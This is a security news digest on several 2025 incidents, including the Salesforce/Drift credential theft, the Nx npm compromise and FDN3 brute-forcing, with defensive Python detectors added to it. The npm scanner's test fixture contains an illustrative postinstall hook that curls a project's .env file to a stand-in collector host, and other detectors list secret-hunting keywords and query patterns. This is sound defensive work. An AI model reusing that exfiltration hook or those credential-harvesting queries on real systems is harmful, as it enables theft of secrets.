Salesforce Targeted in Widespread Credential Theft Campaign
A recent, large-scale credential theft operation has targeted Salesforce customers, leading to systematic data exfiltration and raising concerns over supply chain vulnerability. The attack’s advanced tactics and operational discipline have prompted speculation about nation-state involvement.
Indicators and Attack Scope
Between August 8 and August 18, attackers focused on extracting sensitive credentials such as AWS keys, passwords, and Snowflake tokens from multiple Salesforce instances. Security teams observed structured queries designed to enumerate and harvest the most valuable secrets. The attackers attempted to cover their tracks by deleting evidence of jobs executed, a marker of sophisticated tradecraft.
Mitigation and Response Actions
Salesloft, the third-party vendor of the Drift integration, revoked all Drift–Salesforce app connections in response, requiring administrators to reauthenticate. Salesforce has temporarily removed the Drift integration from its AppExchange while investigations continue. Google, among others, urged all Drift users to assume compromise, rotate potentially exposed credentials, revoke API keys, and perform thorough log audits for any signs of anomaly.
Attribution and Defensive Guidance
Security experts, including AppOmni’s CSO, believe the operational scale and discipline suggest the involvement of a state-affiliated group. The campaign is distinguished by focused queries for credential objects and post-compromise cleanup efforts. Organizations are advised to promptly remove non-essential integrations and deploy enhanced monitoring on platform credentials, especially in cloud-based environments where supply chain attacks cause cascading risk.
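The log audit recommended above can be approached by looking for the two behaviours this section describes: queries that filter text fields for credential-like strings, and deletion of job records after the fact. The following Python is an added example written for this digest, not code from Salesforce, Google or AppOmni. The record layout (EVENT_TYPE, USER_NAME, QUERY, ROWS_PROCESSED), the sample rows and the user names are constructed assumptions modelled loosely on API event logs, not real Salesforce output; the keyword list and row threshold are starting points to tune per tenant.

```python
# Constructed sample records. Field names and values are illustrative assumptions,
# not real Salesforce event log output.
SAMPLE_EVENTS = [
    {"EVENT_TYPE": "API", "USER_NAME": "integration@example.test",
     "QUERY": "SELECT Id, Name FROM Account LIMIT 200", "ROWS_PROCESSED": 200},
    {"EVENT_TYPE": "API", "USER_NAME": "drift-app@example.test",
     "QUERY": "SELECT Id, Subject, Description FROM Case WHERE Description LIKE '%AKIA%'",
     "ROWS_PROCESSED": 5120},
    {"EVENT_TYPE": "API", "USER_NAME": "drift-app@example.test",
     "QUERY": "SELECT Body FROM EmailMessage WHERE Body LIKE '%password%' OR Body LIKE '%snowflake%'",
     "ROWS_PROCESSED": 8900},
    {"EVENT_TYPE": "BulkApi", "USER_NAME": "drift-app@example.test",
     "QUERY": "DELETE JobInfo", "ROWS_PROCESSED": 12},
]

# Strings an attacker hunting for secrets tends to filter on (assumed list; extend per tenant).
SECRET_TERMS = ("akia", "password", "secret", "token", "snowflake", "api_key", "apikey")


def is_secret_hunting(query):
    """True when a query filters free-text fields for credential-like substrings."""
    q = query.lower()
    if "like" not in q:
        return False
    return any(term in q for term in SECRET_TERMS)


def is_cleanup(query):
    """True for statements that delete job records, the cleanup behaviour described above."""
    q = query.lower()
    return q.startswith("delete") and "job" in q


def audit(events, bulk_threshold=1000):
    """Return (user, query, reasons) for every event matching at least one indicator."""
    findings = []
    for ev in events:
        reasons = []
        if is_secret_hunting(ev["QUERY"]):
            reasons.append("credential-hunting filter")
        if ev["ROWS_PROCESSED"] >= bulk_threshold:
            reasons.append("bulk row volume")
        if is_cleanup(ev["QUERY"]):
            reasons.append("job record deletion")
        if reasons:
            findings.append((ev["USER_NAME"], ev["QUERY"], reasons))
    return findings


def suspicious_users(findings):
    """Collapse findings per user; a user hitting several indicators is triaged first."""
    per_user = {}
    for user, _, reasons in findings:
        per_user.setdefault(user, set()).update(reasons)
    return {u: sorted(r) for u, r in per_user.items()}


if __name__ == "__main__":
    for user, reasons in suspicious_users(audit(SAMPLE_EVENTS)).items():
        print(user, "->", ", ".join(reasons))
```

Run against a real export, the useful signal is the combination: one integration identity that both filters for secret-shaped strings and later deletes its own job records is far more telling than either indicator alone.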
Citrix NetScaler ADC and Gateway Flaws Under Active Exploit
Citrix has disclosed three new vulnerabilities affecting NetScaler ADC and Gateway products, including a zero-day flaw already under exploitation in the wild. These bugs pose considerable risk to remote access infrastructure, especially among organizations still running unsupported versions.
Technical Details of Disclosed Vulnerabilities
The most severe flaw, CVE-2025-7775, is a memory overflow bug rated CVSS 9.2. It enables unauthenticated remote attackers to execute arbitrary code, take control of, or crash vulnerable NetScaler appliances. Systems with active VPN, remote access, IPv6 configurations, or advanced content routing are particularly exposed. Two further issues, CVE-2025-7776 (CVSS 8.8) and CVE-2025-8424 (CVSS 8.7), allow denial-of-service attacks or improper data access, respectively.
Risk Amplification Factors
Analysts highlight the significant risk due to a prevalence of unsupported NetScaler versions. Almost 20% of Internet-facing NetScaler devices are believed to be out-of-date, leaving them “ticking time bombs.” While these new flaws affect components similar to last year’s “CitrixBleed” vulnerabilities, they are technically unrelated.
Incident Response and Prevention
Security professionals recommend urgent patching or upgrading of NetScaler appliances, alongside rigorous network segmentation and access controls. Comprehensive forensic review should be conducted for signs of remote compromise, including unexpected process executions and configuration changes in VPN and related modules.
Attackers Abuse Velociraptor Incident Response Tool for Compromise
Adversaries have begun exploiting the open-source Velociraptor digital forensics and incident response (DFIR) tool to gain persistence and deploy further payloads within compromised environments. This new abuse vector emphasizes the evolving threat landscape surrounding security tool supply chains.
Abuse Methods and Technical Mechanisms
Attackers are leveraging Velociraptor’s script extensibility and agent deployment capabilities, using the platform’s legitimate features to automate lateral movement, execute custom commands, and maintain footholds. In observed cases, adversaries repurpose Velociraptor configuration profiles, integrating their own PowerShell loaders, Cobalt Strike beacons, and data exfiltration commands inside routine scanning or artifact collection modules.
Defensive Recommendations
Security teams are advised to treat Velociraptor and similar DFIR tools as high-risk assets, limiting their deployment to dedicated, segmented administration networks. Implement strict access controls, monitor tool configurations for unauthorized changes, and regularly audit command execution logs. A strong software signing policy and periodic integrity verification of tool binaries can minimize the risk of supply chain manipulation or internal abuse.
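The periodic integrity verification recommended above comes down to taking a hashed baseline of the tool's binaries and configuration and re-checking it on a schedule. The following Python is an added example for this digest, not part of Velociraptor or any vendor's tooling. It builds a SHA-256 manifest of a directory tree, then reports files added, removed or modified since the baseline; the demo directory, file names and YAML contents are constructed stand-ins for a DFIR server's configuration and artifact definitions.

```python
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path, chunk=65536):
    """Stream a file through SHA-256 so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each file path (relative to root, POSIX style) to its SHA-256 digest."""
    root = Path(root)
    manifest = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            manifest[p.relative_to(root).as_posix()] = sha256_file(p)
    return manifest


def verify(root, baseline):
    """Compare the current tree against a stored baseline manifest."""
    current = build_manifest(root)
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(k for k in baseline if k in current and current[k] != baseline[k])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed scenario: baseline a throwaway tool directory, then tamper with it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "artifacts").mkdir()
        # Assumed file names; not a real Velociraptor layout.
        (root / "server.config.yaml").write_text("Frontend:\n  hostname: dfir.example.test\n")
        (root / "artifacts" / "Generic.Collect.yaml").write_text("name: Generic.Collect\nsources: []\n")
        baseline = build_manifest(root)

        # Simulated unauthorized change: a new artifact definition and an edited server config.
        (root / "artifacts" / "Custom.Loader.yaml").write_text("name: Custom.Loader\n")
        (root / "server.config.yaml").write_text("Frontend:\n  hostname: evil.example.test\n")
        return verify(root, baseline)


if __name__ == "__main__":
    print(demo())
```

In practice the baseline manifest should be stored (and ideally signed) off the host being checked, otherwise an adversary who can edit the configuration can edit the baseline too.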
npm ‘Nx’ Supply-Chain Attack Leaks Thousands of Sensitive Files
The npm package ecosystem has suffered another supply-chain attack, this time involving the widely used ‘Nx’ CI pipeline tool. The compromise led to the exposure of nearly 20,000 sensitive files from affected development environments.
Attack Vector and Technical Analysis
The compromise occurred when malicious versions of the Nx package were published containing a post-install script designed to search, bundle, and transmit local project files to a remote host controlled by the attacker. Targeted files included .env secrets, configuration files, and OAuth tokens stored in development directories. The script evaded basic static analysis tools through obfuscated logic and staged execution, and used process environment variables to target popular continuous integration and testing platforms.
Mitigation Techniques
Developers and organizations using npm should immediately audit their dependency trees for anomalous versions of Nx, particularly those released in August 2025. Instituting control measures such as package integrity checks, lockfile validation, and automated static analysis for post-install hooks is recommended. Organizations may also benefit from network monitoring for outbound connections from build environments, especially those matching known Nx compromise indicators.
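The automated review of post-install hooks recommended above can be scripted directly against an installed tree: walk every package.json under node_modules, pull out the install-time lifecycle scripts, and flag bodies that reach the network, read environment variables, or run inline code. The following Python is an added example for this digest, not Nx project code. The package names, versions and script bodies in the demo are constructed; the indicator patterns are a starting heuristic, not a complete detector.

```python
import json
import re
import tempfile
from pathlib import Path

# npm lifecycle scripts that run without the developer invoking them explicitly.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Heuristic indicators in a script body: outbound transfer, env harvesting,
# obfuscation, and inline interpreter execution.
INDICATORS = {
    "network": re.compile(r"\b(curl|wget|fetch|https?://)", re.I),
    "env_access": re.compile(r"process\.env|\$\{?[A-Z_]{3,}\}?"),
    "obfuscation": re.compile(r"base64|eval\(|Function\(|fromCharCode", re.I),
    "inline_exec": re.compile(r"node\s+-e\b|sh\s+-c\b|bash\s+-c\b"),
}


def audit_package(pkg_json_path):
    """Return one finding per lifecycle hook defined in a package.json."""
    data = json.loads(Path(pkg_json_path).read_text())
    scripts = data.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        body = scripts.get(hook)
        if not body:
            continue
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        findings.append({"package": data.get("name"), "version": data.get("version"),
                         "hook": hook, "script": body, "indicators": hits})
    return findings


def audit_tree(node_modules):
    """Audit every package.json below a node_modules directory."""
    results = []
    for pkg_json in sorted(Path(node_modules).rglob("package.json")):
        results.extend(audit_package(pkg_json))
    return results


def demo():
    """Constructed node_modules with one benign native build step and one exfiltrating hook."""
    with tempfile.TemporaryDirectory() as d:
        nm = Path(d) / "node_modules"
        (nm / "benign-lib").mkdir(parents=True)
        (nm / "benign-lib" / "package.json").write_text(json.dumps({
            "name": "benign-lib", "version": "1.0.0",
            "scripts": {"postinstall": "node-gyp rebuild"}}))
        (nm / "suspect-tool").mkdir(parents=True)
        # Illustrative malicious hook: inline node, reads CI env, posts .env to a constructed host.
        (nm / "suspect-tool" / "package.json").write_text(json.dumps({
            "name": "suspect-tool", "version": "9.9.9",
            "scripts": {"postinstall":
                "node -e \"require('child_process').exec('curl -s -d @.env "
                "https://collector.example.test/' + process.env.CI_JOB_ID)\""}}))
        return audit_tree(nm)


if __name__ == "__main__":
    for f in demo():
        if f["indicators"]:
            print(f["package"], f["version"], f["hook"], f["indicators"])
```

Pair this with `npm install --ignore-scripts` in CI where native builds are not required, so a hook has to be reviewed before it ever runs.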
TransUnion Breach Compromises Data of 4.4 Million Individuals
Credit reporting agency TransUnion has disclosed a data breach impacting approximately 4.4 million people. The incident highlights ongoing risks with storing and processing high volumes of sensitive personal information.
Breach Details and Data Exposure
Attackers reportedly accessed internal systems through a combination of credential compromise and lateral privilege escalation. Exfiltrated files contained identity information, credit data, and social security numbers. The attackers exploited weaknesses in third-party cloud storage configurations, gaining persistent access to backend data aggregation systems before being detected.
Incident Response and Consumer Protection
TransUnion initiated a comprehensive review of access controls and cloud platform configurations, working with law enforcement and outside consultants. Affected individuals are being notified and offered identity protection services. The breach follows recent market-wide regulatory scrutiny of credit agencies’ security practices, raising the urgency for implementing zero trust architectures and more aggressive access limitation policies in high-value data sectors.
Ukrainian Network FDN3 Launches Large-Scale Brute-Force Attacks Leveraging Seychelles Bulletproof Hosting
FDN3, a Ukrainian network, has initiated a major brute-force campaign targeting SSL VPN and RDP assets, utilizing infrastructure linked to Seychelles-based bulletproof hosts and offshore peers. The effort is believed to facilitate ransomware deployment.
Technical and Network Infrastructure Insights
The brute-force activity, peaking between July 6–8, 2025, involved prolonged password spraying across corporate endpoints, and analysis suggests the pattern matches established ransomware-as-a-service (RaaS) groups like Black Basta and RansomHub. FDN3’s operational overlap with other prefixes and hosting providers, including Russian-linked entities such as Alex Host LLC and Bulgarian spam networks, points toward sophisticated coordination among offshore ISPs.
Implications and Defensive Measures
The anonymity provided by Seychelles hosts, coupled with technical peering agreements and prefix hosting, underlines the challenges of attribution and takedown in international bulletproof infrastructure. Network defenders should prioritize adaptive password rate-limiting, aggressive IP reputation detection, and broad telemetry sharing to mitigate brute-force and initial access threats. Geofencing and extensive monitoring of traffic from known high-risk autonomous systems are also recommended for vulnerable organizations.
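Two of the controls recommended above, spray detection and adaptive rate-limiting, can be shown on a handful of authentication log lines. The following Python is an added example for this digest, not code from any vendor or from the FDN3 research. The log format, timestamps, user names and source addresses are constructed (documentation-range IPs), and the window, account threshold and backoff parameters are assumed defaults to tune locally. Spraying is flagged per source address by counting distinct accounts that fail within a sliding window; the limiter applies per-source exponential backoff that resets on success.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed log format: "<iso-ts> <service> auth <ok|fail> user=<name> src=<ip>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<svc>\w+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$")

SAMPLE_LOG = """\
2025-07-07T10:00:01Z vpn auth fail user=alice src=203.0.113.5
2025-07-07T10:00:03Z vpn auth fail user=bob src=203.0.113.5
2025-07-07T10:00:05Z vpn auth fail user=carol src=203.0.113.5
2025-07-07T10:00:07Z vpn auth fail user=dave src=203.0.113.5
2025-07-07T10:00:09Z vpn auth fail user=erin src=203.0.113.5
2025-07-07T10:00:11Z rdp auth fail user=frank src=203.0.113.5
2025-07-07T10:01:00Z vpn auth fail user=alice src=198.51.100.7
2025-07-07T10:01:20Z vpn auth fail user=alice src=198.51.100.7
2025-07-07T10:01:40Z vpn auth ok user=alice src=198.51.100.7
2025-07-07T12:30:00Z vpn auth fail user=grace src=203.0.113.5
"""


def parse(lines):
    """Parse log text into (timestamp, service, result, user, src) tuples, skipping junk."""
    events = []
    for line in lines.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append((ts, m["svc"], m["result"], m["user"], m["src"]))
    return events


def detect_spray(events, window=timedelta(minutes=5), min_users=5):
    """Map src -> max distinct accounts failed within any `window`, for sources >= min_users."""
    by_src = defaultdict(list)
    for ts, _svc, result, user, src in events:
        if result == "fail":
            by_src[src].append((ts, user))
    alerts = {}
    for src, fails in by_src.items():
        fails.sort()
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            users = {u for _, u in fails[start:end + 1]}
            if len(users) >= min_users:
                alerts[src] = max(alerts.get(src, 0), len(users))
    return alerts


class AdaptiveLimiter:
    """Per-source exponential backoff: each failure doubles the hold-off, success resets it."""

    def __init__(self, base=1.0, cap=300.0):
        self.base, self.cap = base, cap
        self.state = {}  # src -> (consecutive_failures, not_before)

    def allow(self, src, ts):
        _, not_before = self.state.get(src, (0, ts))
        return ts >= not_before

    def record(self, src, ts, ok):
        fails, _ = self.state.get(src, (0, ts))
        if ok:
            self.state[src] = (0, ts)
            return 0.0
        fails += 1
        delay = min(self.cap, self.base * 2 ** (fails - 1))
        self.state[src] = (fails, ts + timedelta(seconds=delay))
        return delay


def replay(events):
    """Count attempts the limiter would have rejected before a password was even checked."""
    limiter = AdaptiveLimiter()
    blocked = 0
    for ts, _svc, result, _user, src in sorted(events):
        if not limiter.allow(src, ts):
            blocked += 1
            continue
        limiter.record(src, ts, result == "ok")
    return blocked


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    print("spray sources:", detect_spray(evs))
    print("attempts blocked by backoff:", replay(evs))
```

Keying the limiter on source address is the right first step against a single bulletproof prefix, but a distributed spray across many sources needs the per-account view as well, which is why both the detector and the limiter should run side by side.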
US CISA 2015 Safe Harbor Reauthorization Uncertainty Poses Threat Intelligence Risks
The impending expiration of the US Cybersecurity Information Sharing Act (CISA) 2015 has raised fears that legal uncertainty could impede threat intelligence sharing and weaken defenses against advanced attacks.
Potential Impact of Legislative Lapse
If not renewed by September 30, US companies may lose safe harbor protections essential for sharing cyber threat indicators, reducing automated feed participation and fragmenting sector collaboration. Legal hesitation will particularly affect incidents involving customer and employee data and could disrupt broad cross-industry detection pipelines.
Operational and Compliance Preparation
Organizations are advised to review internal sharing policies, update compliance guidance for legal teams, and develop contingency plans for narrowed information channels. Emphasis should be placed on trusted networks and privacy controls, with increased scrutiny of statutory safeguards surrounding personally identifiable information (PII).